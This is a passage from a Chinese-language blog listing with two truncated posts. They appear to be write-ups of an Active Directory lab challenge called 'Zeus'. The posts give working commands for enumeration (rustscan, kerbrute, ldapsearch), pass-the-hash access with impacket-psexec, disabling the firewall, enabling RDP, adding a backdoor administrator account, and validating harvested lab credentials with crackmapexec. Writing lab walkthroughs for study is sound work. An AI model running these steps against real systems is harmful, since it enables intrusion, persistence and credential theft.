發表文章

目前顯示的是有「Zeus」標籤的文章

Challenge 7 - Zeus(1)

圖片
 Challenge 7 - Zeus(1) 先用 impacket-psexec 進入 .160,└─$ impacket-psexec -hashes :97db5c87465431b9091d47a58fe76483 administrator@192.168.182.160 開啟 RDP,關閉 Firewall reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall set allprofiles state off 新增一組憑證 aries:Oscp#1234 然後加入本機的 administrators 管理者群組 net user aries Oscp#1234 /add net localgroup administrators aries /add 在使用者 z.thomas 的 Download 資料夾中有一個名稱為 "Onboarding Document" 的檔案 看來是報到文件,各一個 *.docx 的 Word 檔案,內容看來是使用者的預設密碼 z.thomas: ^1+>pdRLwyct]j,CYmyi 立馬 crackmapexec 測試看看,└─$ crackmapexec smb 192.168.182.158-160 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -d zeus.corp  看來是有效的憑證 跑一下遠端 BloodHound 查看一下有無更新,└─$ bloodhound-python -d zeus.corp -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' -gc dc01.zeus.corp -c all -ns 192.168.182.158 看來 z.thomas 屬於 Remote Management 群組成員 立馬 crackmapexec 測試一下 winrm,發現可以進 DC01 .158 e...

Challenge 7 - Zeus(0)

圖片
 Challenge 7 - Zeus(0) 近期又推出了新的 LAB Challenge 7 - Zeus 宙斯,只有三台看來是個 AD 題組 且三台同網段,研判是模擬考試環境三台都對外的 AD 題組 三台都是 Windows 三台都先 Rustscan 掃掃看,└─$ rustscan -a 192.168.116.158 --scripts none --ulimit 5000 | tee rustscan 158 看來是一台 DC 159 看來沒有甚麼 160 看來也沒有甚麼 三台的 snmp 也都沒有效 nmap LDAP Search,└─$ sudo nmap -n -sV -Pn --script ldap-search.nse 192.168.116.158 | tee nmap-ldap-search  網域名稱 : zeus.corp LDAP 物件查詢沒有結果,└─$ ldapsearch -v -x -b "DC=zeus,DC=corp" -H "ldap://192.168.116.158" "(objectclass=*)" 使用者枚舉看看,└─$ ./kerbrute_linux_amd64 userenum --dc 192.168.116.158 -d zeus.corp -o kerbrute-user-enum xato-net-10-million-usernames.txt 跑了一段時間只有枚舉到預設的帳號 administrator、guest SMB 枚舉看看,使用匿名都無法存取,但是帶入 zeus\guest 可以在 .159 發現有個特殊的分享路徑 SQL smb 連線該資料夾,└─$ smbclient \\\\192.168.116.159\\SQL -U 'zeus\guest' 當中有一個檔案 connection.sql,抓回來到 kali 查看檔案發現一組帳號密碼 zeus.corp\db_user:Password123! crackmapexec 測試一下是一組有效的憑證,└─$ crackmapexec smb 192.168.116.158-160 -u db_user -p 'Password123!...